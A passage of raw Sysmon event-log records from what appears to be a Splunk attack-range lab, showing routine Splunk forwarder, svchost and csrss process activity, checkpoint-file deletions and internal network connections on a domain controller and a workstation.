11:25:20.137{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.137{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.137{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.137{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-19A0-6216-6C07-000000003802}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.137{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19A0-6216-6C07-000000003802}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.139{C8EA50B7-19A0-6216-6C07-000000003802}1120C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:20.021{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=464B5803CF285ED8EAF82F08ACFC2998,SHA256=5707313190B5C8B8ED2C2601AD114D71064546023DA3D8077448CB7FA4A13251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:21.915{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73C743A0DE7E15A854A7A06A7389A5F0,SHA256=B8AD52C5286CEE8ED31D66ACDFBA5C8D40F83E309E86A57DC0694E243C73D0EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:19.590{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51746-false10.0.1.12-8000- 354300x8000000000000000299047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:18.669{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49580-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000299046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-19A1-6216-6E07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-19A1-6216-6E07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.390{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-19A1-6216-6E07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.392{C8EA50B7-19A1-6216-6E07-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.052{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB34628FB688460028A58AAC2DEF5F6E,SHA256=BEF83FB1FE6876D1AC9E9E2630A53BDD1255448831ED20289371E357A1142CE4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:21.021{C8EA50B7-19A0-6216-6D07-000000003802}23446504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:22.931{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD8197E3394BA4459267C03A55B50801,SHA256=ED2C8A0CA83E1C66F77242B5568AFF14AD22D46A0D26A35D636449C0D0FC4BDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:22.057{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB4D7D6753814C530E5F3460729ABAE3,SHA256=33D48339100EAC505665B2AED64669DDC4529820DA61AF2ECE66CEF75CCAB0FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:23.947{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542DD64558966BA8EBCBB5D9B3D69605,SHA256=B4CDA78FF358FEC76C79D1D4551B81AE01E8B3C83AF1EAFA6C798847EAA44E79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:23.073{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8543E558C58CD87554CC9CF5E7AD153,SHA256=53510C0E83976636879C2B220D2AFB877CC24032654F35F28B7E3987714082A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:24.094{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD9531A3FFFC350A176F89BC9692E32E,SHA256=CE6D9F2F6E2285FB589616E1647D973368ABA633B5B87560AC66F9D6303EDC64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:25.009{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332E7AAF450A0A3D24F53777B9CFA785,SHA256=CCF0136CD6B70E12315169DDACF8C9748CF45E6F5E13302508206B09416DEF5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:25.124{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61F2160E93A0E9B51F4C0D18ECAB3F7A,SHA256=320EFF1CFB469A3DB088B98225612363C88A14D5E2C560A0F81EECD8BADBA2E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:24.622{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51747-false10.0.1.12-8000- 23542300x8000000000000000222863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:26.259{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CE43C8DBC34CEE306A4ABFAF6A9903,SHA256=742C32F586D8A4561E913629F03DA3D06DAF1C0FB5296AA6A256D019044A1553,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:24.634{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49581-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:26.155{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4BED64C3E5082A21217239949C2CA63,SHA256=0616F1BD2DFEAD776B43225FD1BF47880300F2AC9551DF8EFB35A8CA13560D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:27.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=562A4B32AC52D68EEA1FE79628F4927C,SHA256=CB86432DC76045989E3D23E1FF7CD80DF86386BA597E8841FE3FE6803DF4692D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:27.171{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B44FFC0978344AB72C6CFCD90F17FA,SHA256=0378E452539CAC5AEEBCDD7ADB7E93163FFAAFC7DE3C37836E6235926582E546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:28.587{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B89216E87D97BD65ED3284FF7CA2654,SHA256=D73F553DB500CA7552317D3CED62C651749F9EAF103BC16242DFD55EC7D4F271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:28.191{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BFF51054CF86B2BBCE3AA341B43BCAE,SHA256=25D521A515C5E99B2757E955DC48FC02DC756D679DED6A537FCE722760BECEED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:29.696{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDEBB92ADA0ED894870C2EC33EB4D983,SHA256=F1FFBD621D7808AAF3FA83B18296EC86850A7EA880D899476793966C554C8A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:29.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C1C98E1B7FF721F683DBECF4D90F74E,SHA256=6992E3A40D6C54691653589FC0EA25E7780055080F135C3D1A4FFAE43DEC6BFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:30.775{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77B247B986545A1B8C7DBAEA69EE02F3,SHA256=A93954D57F3125B483D7A19692EE502A9267A68CCB5762AF80848C6C24A276C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 